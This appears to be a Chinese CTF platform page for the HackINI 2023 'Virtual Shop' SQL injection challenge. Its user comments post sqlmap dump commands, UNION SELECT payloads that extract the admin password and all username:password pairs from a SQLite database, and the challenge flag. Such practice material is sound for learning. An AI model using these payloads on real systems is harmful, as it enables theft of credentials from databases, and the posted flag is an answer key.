Virtual ShopWEB 未解决

分数: 0 金币: 0
所属赛事: HackINI 2023
题目作者: 未知
一  血: heyile
一血奖励: 0金币
解  决: 307
提  示:
描  述:
So, let's see if you can retrieve the `password` of the admin which\ \ `username` is 'admin' among all the available `users` in the db\n\n\n **Author**:\ \ F100w"
评论
欧尼酱001 9月前

1、将请求包保存为1.txt 2、python3 sqlmap.py -r 1.txt --batch --tables 3、python3 sqlmap.py -r 1.txt --batch -T users --dump 即可跑出表字段:shellmates{Gg_b0Y_you_kNOW_w3ll_H0w_T0_uSe_uNiOn_4tTacK}

回复 0
WCRH 8月前

这又不是post请求,你还保存上txt了

回复 0

.⎛⎝•̀ω•́⎠⎞. 1年前

只用sqlmap就可以做出来,很简单的一个注入

回复 0

FADogeCTF 1年前

union查询

回复 0

xiaobai568 1年前

前面的太复杂了吧,-1'union select (select password from users where username='admin'),5,3,4 -- 直接就出来了

回复 1

JJhello 1年前

sqlmap即可

回复 0

chaoge 1年前

sqlite,弄了半天认为是MySQL呢。

回复 0

justsosoloveyou 1年前

' UNION SELECT (select group_concat(sql) from sqlite_master WHERE type='table'),NULL,NULL,(select group_concat(username||':'||password) FROM users)--+

回复 1

SS3B 1年前

sqlmap一下子就出来了

回复 0

hopeinhand 1年前

联合查询注入,表名、列名、用户名全给了,都没啥好说的了

回复 0

WriteUp

image
heyile

1 金币

评分(0)

暂无评分

解题动态

17335918325 攻破了该题 2小时前
buuble123 攻破了该题 23小时前
18516952839 攻破了该题 1天前
huaji48254 攻破了该题 1天前
你不懂的吧 攻破了该题 6天前
violetyy 攻破了该题 16天前
1840788830 攻破了该题 16天前
hutouyu 攻破了该题 25天前
theo1234 攻破了该题 28天前
sugelameiyoudi 攻破了该题 1月前
lunarbyside 攻破了该题 1月前
nuxe 攻破了该题 1月前
smtall 攻破了该题 1月前
ljt1016 攻破了该题 1月前
llc123 攻破了该题 1月前
dongwanli 攻破了该题 1月前
senxiang 攻破了该题 1月前
cjydawn 攻破了该题 2月前
kaiyafanfan123 攻破了该题 2月前
LuoTianYi 攻破了该题 2月前
问题反馈